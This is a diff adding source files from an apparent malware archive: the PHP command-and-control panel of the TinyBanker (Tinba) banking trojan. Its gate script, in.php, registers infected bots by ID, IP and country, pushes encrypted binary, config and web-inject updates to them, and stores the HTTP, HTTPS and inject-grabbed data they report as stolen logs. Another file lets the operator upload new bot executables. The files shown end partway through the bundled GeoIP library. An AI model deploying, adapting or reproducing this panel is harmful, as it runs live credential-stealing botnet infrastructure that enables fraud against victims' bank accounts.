include "system.server.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "system.apache.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "system.php.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->
<!-- TAB 4 begin -->
<table cellspacing=0 id='el_4' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 4 tabcontent begin -->\n";
include "system.mysql.php";
print " <!-- TAB 4 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 4 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/system.php.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "php";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/system.server.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "server";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tasks.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tasks.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "tasks.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Update</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>tasks2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>tasks3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "tasks.update.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "tasks.tasks2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "tasks.tasks3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tasks.tasks2.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tasks2";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tasks.tasks3.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tasks3";
?>

36
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tasks.update.php Normal file
View File

@@ -0,0 +1,36 @@
<?php
if (!BOT) exit();
if ($_POST['delete']) {
unlink('../data/binaries/binary');
}
elseif (!empty($_FILES)) {
$DATA = file_get_contents($_FILES['binfile']['tmp_name']);
if ($DATA{0}=='M' and $DATA{1}=='Z') file_put_contents('../data/binaries/binary', $DATA);
}
clearstatcache();
$STAT = @stat('../data/binaries/binary');
print "<form method=post enctype=multipart/form-data>
<table cellspacing=1 cellpadding=0 class=block>
<tr>
<td width=250px><b>BINARY UPDATE<br><br>";
if ($STAT['mtime']) print " file size: {$STAT['size']} bytes<br>
uploaded: ".date("d/m/Y - H:i:s", $STAT['mtime'])."</b><br><br>
<input type=submit class=button name='delete' value='DELETE'>";
print "</td>
<td><input type=file style='width:200px;' name='binfile'> <input type=submit class=button value='GO'></td>
</tr>
</table>
</form>";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tracking.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tracking.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "tracking.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>tracking1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>tracking2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>tracking3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "tracking.tracking1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "tracking.tracking2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "tracking.tracking3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tracking.tracking1.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tracking1";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tracking.tracking2.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tracking2";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/tracking.tracking3.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "tracking3";
?>

2
malwares/Source/Original/TinyBanker_Jan2012/admin/data/.htaccess Normal file
View File

@@ -0,0 +1,2 @@
order allow,deny
deny from all

4
malwares/Source/Original/TinyBanker_Jan2012/admin/data/titles/botnets.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$BOTNETS = array();
$BOTNETS['default'] = array('password' => 'default_password', 'comment' => 'default botnet');

4
malwares/Source/Original/TinyBanker_Jan2012/admin/data/titles/suppliers.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$SUPPLIERS = array();
$SUPPLIERS['first'] = array('comment' => '111');

154
malwares/Source/Original/TinyBanker_Jan2012/admin/in.php Normal file
View File

@@ -0,0 +1,154 @@
<?php
/*
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> INSERT INTO new_table SELECT <20><><EFBFBD><EFBFBD>-<2D>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> FROM old_table.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> old_table.
ALTER TABLE new_table RENAME old_table.
INSERT INTO bots2 SELECT bot_uid, bot_os, bot_ip, bot_country, bot_net, bot_supp, bot_supp_sub, time_birth, time_last, time_inj, comment FROM bots1
*/
if ($_SERVER['REQUEST_METHOD'] !== 'POST') die();
$DATA = file_get_contents('php://input');
if (($DATA_len = strlen($DATA)) < 9) die();
$data_type = ord($DATA{4});
//file_put_contents('IN.TXT', $DATA);
function GetCountry($bot_ip) {
$GI = geoip_open('includes/GeoIP.dat', GEOIP_STANDARD);
$bot_country = geoip_country_code_by_addr($GI, $bot_ip);
geoip_close($GI);
return $bot_country;
}
function Update($command, $file, $time) {
GLOBAL $ENC_PASS;
$time_upd = intval(@filemtime($file));
if (!$time_upd or $time_upd == $time) return 0;
echo chr($command);
if ($command == 1) echo file_get_contents($file);
else echo encrypt($ENC_PASS, file_get_contents($file));
return $time_upd;
}
require 'includes/rc4.php';
require 'includes/geoip.php';
require 'includes/mysql.php';
require 'data/titles/botnets.php';
define (CMD_UPDATE_BINARY, 1);
define (CMD_UPDATE_CONFIG, 2);
define (CMD_UPDATE_INJECTS, 3);
$thetime = time();
$bot_uid = sprintf("%02X%02X%02X%02X", ord($DATA{3}), ord($DATA{2}), ord($DATA{1}), ord($DATA{0}));
$bot_ip = getenv("REMOTE_ADDR");
$bot_os = "--";
$bot_net = "default";
$bot_supp = "first";
$supp_sub = 0;
//$bot_ip = mt_rand(1,255).".".mt_rand(1,255).".".mt_rand(1,255).".".mt_rand(1,255);
$query = "SELECT * FROM `bots` WHERE `bot_uid`='{$bot_uid}';";
$row = mysql_fetch_assoc(mysql_query($query));
$query = "";
$time_bin = $time_cfg = $time_inj = 0;
$ENC_PASS = $BOTNETS[$bot_net]['password'];
if ($data_type==0 and encrypt($ENC_PASS, substr($DATA, 9, 4))=="EHLO") {
if (($time_bin = Update(CMD_UPDATE_BINARY, 'data/binaries/binary', $row['time_bin'])) > 0) $query .= "`time_bin`='{$time_bin}', ";
elseif (($time_cfg = Update(CMD_UPDATE_CONFIG, 'data/configs/config', $row['time_cfg'])) > 0) $query .= "`time_cfg`='{$time_cfg}', ";
elseif (($time_inj = Update(CMD_UPDATE_INJECTS, 'data/injects/injects', $row['time_inj'])) > 0) $query .= "`time_inj`='{$time_inj}', ";
}
if ($row['bot_uid'] == $bot_uid) {
$query = "UPDATE `bots` SET ".$query;
if ($row['bot_ip'] != $bot_ip) {
$row['bot_country'] = GetCountry($bot_ip);
$query .= "`bot_ip`='{$bot_ip}', `bot_country`='{$row['bot_country']}', ";
}
$query .= "`time_last`={$thetime} WHERE `bot_uid`='{$bot_uid}';";
mysql_query($query);
}
else {
$row['bot_country'] = GetCountry($bot_ip);
$query = "INSERT INTO `bots` VALUES ('{$bot_uid}', '{$bot_os}', '{$bot_ip}', '{$row['bot_country']}', '{$bot_net}', '{$bot_supp}', {$supp_sub}, {$thetime}, {$thetime}, {$time_bin}, {$time_cfg}, {$time_inj}, '');";
mysql_query($query);
}
$offset = 4;
$logs_table_name = 'logs_'.date('ymd', $thetime);
while ($offset < $DATA_len) {
$log_type = ord($DATA{$offset++});
$log_len = ord($DATA{$offset++}) | (ord($DATA{$offset++})<<8) | (ord($DATA{$offset++})<<16) | (ord($DATA{$offset++})<<24);
$offset += $log_len;
if ($offset > $DATA_len) die;
if ($log_type==0) continue;
$log_data = mysql_escape_string(encrypt($BOTNETS[$bot_net]['password'], substr($DATA, $offset-$log_len, $log_len)));
$query = "INSERT INTO `{$logs_table_name}` VALUES (0, '{$bot_uid}', '{$bot_net}', '{$bot_supp}', {$supp_sub}, '{$bot_ip}', '{$row['bot_country']}', {$thetime}, {$log_type}, '{$log_data}', '');";
if (!mysql_query($query) and mysql_errno()==1146) {
$TABLES = array();
$res = mysql_query("SHOW TABLES LIKE 'logs%'");
while ($row = mysql_fetch_row($res)) $TABLES[] = $row[0];
rsort($TABLES);
$res = mysql_query("SHOW TABLE STATUS FROM `{$mysqlbase}` LIKE '{$TABLES[0]}'");
$row = mysql_fetch_assoc($res);
mysql_query("CREATE TABLE IF NOT EXISTS `{$logs_table_name}` (
`log_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`bot_uid` char(40) COLLATE utf8_unicode_ci NOT NULL,
`bot_net` varchar(12) COLLATE utf8_unicode_ci NOT NULL,
`bot_supp` varchar(12) COLLATE utf8_unicode_ci NOT NULL,
`supp_sub` tinyint(3) unsigned NOT NULL,
`bot_ip` varchar(15) COLLATE utf8_unicode_ci NOT NULL,
`bot_country` char(2) COLLATE utf8_unicode_ci NOT NULL,
`timestamp` int(10) unsigned NOT NULL,
`data_type` tinyint(3) unsigned NOT NULL,
`data` text COLLATE utf8_unicode_ci NOT NULL,
`comment` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`log_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=".intval($row['Auto_increment']));
mysql_query($query);
}
}
?>

BIN
malwares/Source/Original/TinyBanker_Jan2012/admin/includes/GeoIP.dat Normal file
View File

Binary file not shown.

13
malwares/Source/Original/TinyBanker_Jan2012/admin/includes/continents.php Normal file
View File

@@ -0,0 +1,13 @@
<?php
$GEOIP_CONTINENT_NAMES = array(
"EU" => "Europe",
"OC" => "Oceania",
"NA" => "North America",
"SA" => "South America",
"AS" => "Asia",
"AF" => "Africa",
"AN" => "Antarctica",
"--" => "Unknown");
?>

9
malwares/Source/Original/TinyBanker_Jan2012/admin/includes/datatypes.php Normal file
View File

@@ -0,0 +1,9 @@
<?php
$DATA_TYPES = array(
"",
"HTTP_REQUEST",
"HTTPS_REQUEST",
"GRABBED_BY_INJECT");
?>

727
malwares/Source/Original/TinyBanker_Jan2012/admin/includes/geoip.php Normal file
View File

@@ -0,0 +1,727 @@
<?php
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 2; tab-width: 2 -*- */
/* geoip.inc
*
* Copyright (C) 2007 MaxMind LLC
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
define("GEOIP_COUNTRY_BEGIN", 16776960);
define("GEOIP_STATE_BEGIN_REV0", 16700000);
define("GEOIP_STATE_BEGIN_REV1", 16000000);
define("GEOIP_STANDARD", 0);
define("GEOIP_MEMORY_CACHE", 1);
define("GEOIP_SHARED_MEMORY", 2);
define("STRUCTURE_INFO_MAX_SIZE", 20);
define("DATABASE_INFO_MAX_SIZE", 100);
define("GEOIP_COUNTRY_EDITION", 106);
define("GEOIP_PROXY_EDITION", 8);
define("GEOIP_ASNUM_EDITION", 9);
define("GEOIP_NETSPEED_EDITION", 10);
define("GEOIP_REGION_EDITION_REV0", 112);
define("GEOIP_REGION_EDITION_REV1", 3);
define("GEOIP_CITY_EDITION_REV0", 111);
define("GEOIP_CITY_EDITION_REV1", 2);
define("GEOIP_ORG_EDITION", 110);
define("GEOIP_ISP_EDITION", 4);
define("SEGMENT_RECORD_LENGTH", 3);
define("STANDARD_RECORD_LENGTH", 3);
define("ORG_RECORD_LENGTH", 4);
define("MAX_RECORD_LENGTH", 4);
define("MAX_ORG_RECORD_LENGTH", 300);
define("GEOIP_SHM_KEY", 0x4f415401);
define("US_OFFSET", 1);
define("CANADA_OFFSET", 677);
define("WORLD_OFFSET", 1353);
define("FIPS_RANGE", 360);
define("GEOIP_UNKNOWN_SPEED", 0);
define("GEOIP_DIALUP_SPEED", 1);
define("GEOIP_CABLEDSL_SPEED", 2);
define("GEOIP_CORPORATE_SPEED", 3);
define("GEOIP_DOMAIN_EDITION", 11);
define("GEOIP_COUNTRY_EDITION_V6", 12);
define("GEOIP_LOCATIONA_EDITION", 13);
define("GEOIP_ACCURACYRADIUS_EDITION", 14);
define("GEOIP_CITYCOMBINED_EDITION", 15);
define("GEOIP_CITY_EDITION_REV1_V6", 30);
define("GEOIP_CITY_EDITION_REV0_V6",31);
define("GEOIP_NETSPEED_EDITION_REV1",32);
define("GEOIP_NETSPEED_EDITION_REV1_V6",33);
define("GEOIP_USERTYPE_EDITION",28);
define("GEOIP_USERTYPE_EDITION_V6",29);
define("GEOIP_ASNUM_EDITION_V6",21);
define("GEOIP_ISP_EDITION_V6",22);
define("GEOIP_ORG_EDITION_V6",23);
define("GEOIP_DOMAIN_EDITION_V6",24);
define("CITYCOMBINED_FIXED_RECORD", 7 );
class GeoIP {
var $flags;
var $filehandle;
var $memory_buffer;
var $databaseType;
var $databaseSegments;
var $record_length;
var $shmid;
var $GEOIP_COUNTRY_CODE_TO_NUMBER = array(
"--" => 0, "AP" => 1, "EU" => 2, "AD" => 3, "AE" => 4, "AF" => 5,
"AG" => 6, "AI" => 7, "AL" => 8, "AM" => 9, "AN" => 10, "AO" => 11,
"AQ" => 12, "AR" => 13, "AS" => 14, "AT" => 15, "AU" => 16, "AW" => 17,
"AZ" => 18, "BA" => 19, "BB" => 20, "BD" => 21, "BE" => 22, "BF" => 23,
"BG" => 24, "BH" => 25, "BI" => 26, "BJ" => 27, "BM" => 28, "BN" => 29,
"BO" => 30, "BR" => 31, "BS" => 32, "BT" => 33, "BV" => 34, "BW" => 35,
"BY" => 36, "BZ" => 37, "CA" => 38, "CC" => 39, "CD" => 40, "CF" => 41,
"CG" => 42, "CH" => 43, "CI" => 44, "CK" => 45, "CL" => 46, "CM" => 47,
"CN" => 48, "CO" => 49, "CR" => 50, "CU" => 51, "CV" => 52, "CX" => 53,
"CY" => 54, "CZ" => 55, "DE" => 56, "DJ" => 57, "DK" => 58, "DM" => 59,
"DO" => 60, "DZ" => 61, "EC" => 62, "EE" => 63, "EG" => 64, "EH" => 65,
"ER" => 66, "ES" => 67, "ET" => 68, "FI" => 69, "FJ" => 70, "FK" => 71,
"FM" => 72, "FO" => 73, "FR" => 74, "FX" => 75, "GA" => 76, "GB" => 77,
"GD" => 78, "GE" => 79, "GF" => 80, "GH" => 81, "GI" => 82, "GL" => 83,
"GM" => 84, "GN" => 85, "GP" => 86, "GQ" => 87, "GR" => 88, "GS" => 89,
"GT" => 90, "GU" => 91, "GW" => 92, "GY" => 93, "HK" => 94, "HM" => 95,
"HN" => 96, "HR" => 97, "HT" => 98, "HU" => 99, "ID" => 100, "IE" => 101,
"IL" => 102, "IN" => 103, "IO" => 104, "IQ" => 105, "IR" => 106, "IS" => 107,
"IT" => 108, "JM" => 109, "JO" => 110, "JP" => 111, "KE" => 112, "KG" => 113,
"KH" => 114, "KI" => 115, "KM" => 116, "KN" => 117, "KP" => 118, "KR" => 119,
"KW" => 120, "KY" => 121, "KZ" => 122, "LA" => 123, "LB" => 124, "LC" => 125,
"LI" => 126, "LK" => 127, "LR" => 128, "LS" => 129, "LT" => 130, "LU" => 131,
"LV" => 132, "LY" => 133, "MA" => 134, "MC" => 135, "MD" => 136, "MG" => 137,
"MH" => 138, "MK" => 139, "ML" => 140, "MM" => 141, "MN" => 142, "MO" => 143,
"MP" => 144, "MQ" => 145, "MR" => 146, "MS" => 147, "MT" => 148, "MU" => 149,
"MV" => 150, "MW" => 151, "MX" => 152, "MY" => 153, "MZ" => 154, "NA" => 155,
"NC" => 156, "NE" => 157, "NF" => 158, "NG" => 159, "NI" => 160, "NL" => 161,
"NO" => 162, "NP" => 163, "NR" => 164, "NU" => 165, "NZ" => 166, "OM" => 167,
"PA" => 168, "PE" => 169, "PF" => 170, "PG" => 171, "PH" => 172, "PK" => 173,
"PL" => 174, "PM" => 175, "PN" => 176, "PR" => 177, "PS" => 178, "PT" => 179,
"PW" => 180, "PY" => 181, "QA" => 182, "RE" => 183, "RO" => 184, "RU" => 185,
"RW" => 186, "SA" => 187, "SB" => 188, "SC" => 189, "SD" => 190, "SE" => 191,
"SG" => 192, "SH" => 193, "SI" => 194, "SJ" => 195, "SK" => 196, "SL" => 197,
"SM" => 198, "SN" => 199, "SO" => 200, "SR" => 201, "ST" => 202, "SV" => 203,
"SY" => 204, "SZ" => 205, "TC" => 206, "TD" => 207, "TF" => 208, "TG" => 209,
"TH" => 210, "TJ" => 211, "TK" => 212, "TM" => 213, "TN" => 214, "TO" => 215,
"TL" => 216, "TR" => 217, "TT" => 218, "TV" => 219, "TW" => 220, "TZ" => 221,
"UA" => 222, "UG" => 223, "UM" => 224, "US" => 225, "UY" => 226, "UZ" => 227,
"VA" => 228, "VC" => 229, "VE" => 230, "VG" => 231, "VI" => 232, "VN" => 233,
"VU" => 234, "WF" => 235, "WS" => 236, "YE" => 237, "YT" => 238, "RS" => 239,
"ZA" => 240, "ZM" => 241, "ME" => 242, "ZW" => 243, "A1" => 244, "A2" => 245,
"O1" => 246, "AX" => 247, "GG" => 248, "IM" => 249, "JE" => 250, "BL" => 251,
"MF" => 252
);
var $GEOIP_COUNTRY_CODES = array(
"--", "AP", "EU", "AD", "AE", "AF", "AG", "AI", "AL", "AM", "AN", "AO", "AQ",
"AR", "AS", "AT", "AU", "AW", "AZ", "BA", "BB", "BD", "BE", "BF", "BG", "BH",
"BI", "BJ", "BM", "BN", "BO", "BR", "BS", "BT", "BV", "BW", "BY", "BZ", "CA",
"CC", "CD", "CF", "CG", "CH", "CI", "CK", "CL", "CM", "CN", "CO", "CR", "CU",
"CV", "CX", "CY", "CZ", "DE", "DJ", "DK", "DM", "DO", "DZ", "EC", "EE", "EG",
"EH", "ER", "ES", "ET", "FI", "FJ", "FK", "FM", "FO", "FR", "FX", "GA", "GB",
"GD", "GE", "GF", "GH", "GI", "GL", "GM", "GN", "GP", "GQ", "GR", "GS", "GT",
"GU", "GW", "GY", "HK", "HM", "HN", "HR", "HT", "HU", "ID", "IE", "IL", "IN",
"IO", "IQ", "IR", "IS", "IT", "JM", "JO", "JP", "KE", "KG", "KH", "KI", "KM",
"KN", "KP", "KR", "KW", "KY", "KZ", "LA", "LB", "LC", "LI", "LK", "LR", "LS",
"LT", "LU", "LV", "LY", "MA", "MC", "MD", "MG", "MH", "MK", "ML", "MM", "MN",
"MO", "MP", "MQ", "MR", "MS", "MT", "MU", "MV", "MW", "MX", "MY", "MZ", "NA",
"NC", "NE", "NF", "NG", "NI", "NL", "NO", "NP", "NR", "NU", "NZ", "OM", "PA",
"PE", "PF", "PG", "PH", "PK", "PL", "PM", "PN", "PR", "PS", "PT", "PW", "PY",
"QA", "RE", "RO", "RU", "RW", "SA", "SB", "SC", "SD", "SE", "SG", "SH", "SI",
"SJ", "SK", "SL", "SM", "SN", "SO", "SR", "ST", "SV", "SY", "SZ", "TC", "TD",
"TF", "TG", "TH", "TJ", "TK", "TM", "TN", "TO", "TL", "TR", "TT", "TV", "TW",
"TZ", "UA", "UG", "UM", "US", "UY", "UZ", "VA", "VC", "VE", "VG", "VI", "VN",
"VU", "WF", "WS", "YE", "YT", "RS", "ZA", "ZM", "ME", "ZW", "A1", "A2", "O1",
"AX", "GG", "IM", "JE", "BL", "MF"
);
var $GEOIP_COUNTRY_CODES3 = array(
"--","AP","EU","AND","ARE","AFG","ATG","AIA","ALB","ARM","ANT","AGO","ATA","ARG",
"ASM","AUT","AUS","ABW","AZE","BIH","BRB","BGD","BEL","BFA","BGR","BHR","BDI",
"BEN","BMU","BRN","BOL","BRA","BHS","BTN","BVT","BWA","BLR","BLZ","CAN","CCK",
"COD","CAF","COG","CHE","CIV","COK","CHL","CMR","CHN","COL","CRI","CUB","CPV",
"CXR","CYP","CZE","DEU","DJI","DNK","DMA","DOM","DZA","ECU","EST","EGY","ESH",
"ERI","ESP","ETH","FIN","FJI","FLK","FSM","FRO","FRA","FX","GAB","GBR","GRD",
"GEO","GUF","GHA","GIB","GRL","GMB","GIN","GLP","GNQ","GRC","SGS","GTM","GUM",
"GNB","GUY","HKG","HMD","HND","HRV","HTI","HUN","IDN","IRL","ISR","IND","IOT",
"IRQ","IRN","ISL","ITA","JAM","JOR","JPN","KEN","KGZ","KHM","KIR","COM","KNA",
"PRK","KOR","KWT","CYM","KAZ","LAO","LBN","LCA","LIE","LKA","LBR","LSO","LTU",
"LUX","LVA","LBY","MAR","MCO","MDA","MDG","MHL","MKD","MLI","MMR","MNG","MAC",
"MNP","MTQ","MRT","MSR","MLT","MUS","MDV","MWI","MEX","MYS","MOZ","NAM","NCL",
"NER","NFK","NGA","NIC","NLD","NOR","NPL","NRU","NIU","NZL","OMN","PAN","PER",
"PYF","PNG","PHL","PAK","POL","SPM","PCN","PRI","PSE","PRT","PLW","PRY","QAT",
"REU","ROU","RUS","RWA","SAU","SLB","SYC","SDN","SWE","SGP","SHN","SVN","SJM",
"SVK","SLE","SMR","SEN","SOM","SUR","STP","SLV","SYR","SWZ","TCA","TCD","ATF",
"TGO","THA","TJK","TKL","TKM","TUN","TON","TLS","TUR","TTO","TUV","TWN","TZA",
"UKR","UGA","UMI","USA","URY","UZB","VAT","VCT","VEN","VGB","VIR","VNM","VUT",
"WLF","WSM","YEM","MYT","SRB","ZAF","ZMB","MNE","ZWE","A1","A2","O1",
"ALA","GGY","IMN","JEY","BLM","MAF"
);
var $GEOIP_COUNTRY_NAMES = array(
"Unknown", "Asia/Pacific Region", "Europe", "Andorra", "United Arab Emirates",
"Afghanistan", "Antigua and Barbuda", "Anguilla", "Albania", "Armenia",
"Netherlands Antilles", "Angola", "Antarctica", "Argentina", "American Samoa",
"Austria", "Australia", "Aruba", "Azerbaijan", "Bosnia and Herzegovina",
"Barbados", "Bangladesh", "Belgium", "Burkina Faso", "Bulgaria", "Bahrain",
"Burundi", "Benin", "Bermuda", "Brunei Darussalam", "Bolivia", "Brazil",
"Bahamas", "Bhutan", "Bouvet Island", "Botswana", "Belarus", "Belize",
"Canada", "Cocos (Keeling) Islands", "Congo, The Democratic Republic of the",
"Central African Republic", "Congo", "Switzerland", "Cote D'Ivoire", "Cook Islands",
"Chile", "Cameroon", "China", "Colombia", "Costa Rica", "Cuba", "Cape Verde",
"Christmas Island", "Cyprus", "Czech Republic", "Germany", "Djibouti",
"Denmark", "Dominica", "Dominican Republic", "Algeria", "Ecuador", "Estonia",
"Egypt", "Western Sahara", "Eritrea", "Spain", "Ethiopia", "Finland", "Fiji",
"Falkland Islands (Malvinas)", "Micronesia, Federated States of", "Faroe Islands",
"France", "France, Metropolitan", "Gabon", "United Kingdom",
"Grenada", "Georgia", "French Guiana", "Ghana", "Gibraltar", "Greenland",
"Gambia", "Guinea", "Guadeloupe", "Equatorial Guinea", "Greece", "South Georgia and the South Sandwich Islands",
"Guatemala", "Guam", "Guinea-Bissau",
"Guyana", "Hong Kong", "Heard Island and McDonald Islands", "Honduras",
"Croatia", "Haiti", "Hungary", "Indonesia", "Ireland", "Israel", "India",
"British Indian Ocean Territory", "Iraq", "Iran, Islamic Republic of",
"Iceland", "Italy", "Jamaica", "Jordan", "Japan", "Kenya", "Kyrgyzstan",
"Cambodia", "Kiribati", "Comoros", "Saint Kitts and Nevis", "Korea, Democratic People's Republic of",
"Korea, Republic of", "Kuwait", "Cayman Islands",
"Kazakhstan", "Lao People's Democratic Republic", "Lebanon", "Saint Lucia",
"Liechtenstein", "Sri Lanka", "Liberia", "Lesotho", "Lithuania", "Luxembourg",
"Latvia", "Libyan Arab Jamahiriya", "Morocco", "Monaco", "Moldova, Republic of",
"Madagascar", "Marshall Islands", "Macedonia",
"Mali", "Myanmar", "Mongolia", "Macau", "Northern Mariana Islands",
"Martinique", "Mauritania", "Montserrat", "Malta", "Mauritius", "Maldives",
"Malawi", "Mexico", "Malaysia", "Mozambique", "Namibia", "New Caledonia",
"Niger", "Norfolk Island", "Nigeria", "Nicaragua", "Netherlands", "Norway",
"Nepal", "Nauru", "Niue", "New Zealand", "Oman", "Panama", "Peru", "French Polynesia",
"Papua New Guinea", "Philippines", "Pakistan", "Poland", "Saint Pierre and Miquelon",
"Pitcairn Islands", "Puerto Rico", "Palestinian Territory",
"Portugal", "Palau", "Paraguay", "Qatar", "Reunion", "Romania",
"Russian Federation", "Rwanda", "Saudi Arabia", "Solomon Islands",
"Seychelles", "Sudan", "Sweden", "Singapore", "Saint Helena", "Slovenia",
"Svalbard and Jan Mayen", "Slovakia", "Sierra Leone", "San Marino", "Senegal",
"Somalia", "Suriname", "Sao Tome and Principe", "El Salvador", "Syrian Arab Republic",
"Swaziland", "Turks and Caicos Islands", "Chad", "French Southern Territories",
"Togo", "Thailand", "Tajikistan", "Tokelau", "Turkmenistan",
"Tunisia", "Tonga", "Timor-Leste", "Turkey", "Trinidad and Tobago", "Tuvalu",
"Taiwan", "Tanzania, United Republic of", "Ukraine",
"Uganda", "United States Minor Outlying Islands", "United States", "Uruguay",
"Uzbekistan", "Holy See (Vatican City State)", "Saint Vincent and the Grenadines",
"Venezuela", "Virgin Islands, British", "Virgin Islands, U.S.",
"Vietnam", "Vanuatu", "Wallis and Futuna", "Samoa", "Yemen", "Mayotte",
"Serbia", "South Africa", "Zambia", "Montenegro", "Zimbabwe",
"Anonymous Proxy","Satellite Provider","Other",
"Aland Islands","Guernsey","Isle of Man","Jersey","Saint Barthelemy","Saint Martin"
);
var $GEOIP_CONTINENT_CODES = array(
"--", "AS", "EU", "EU", "AS", "AS", "NA", "NA", "EU", "AS",
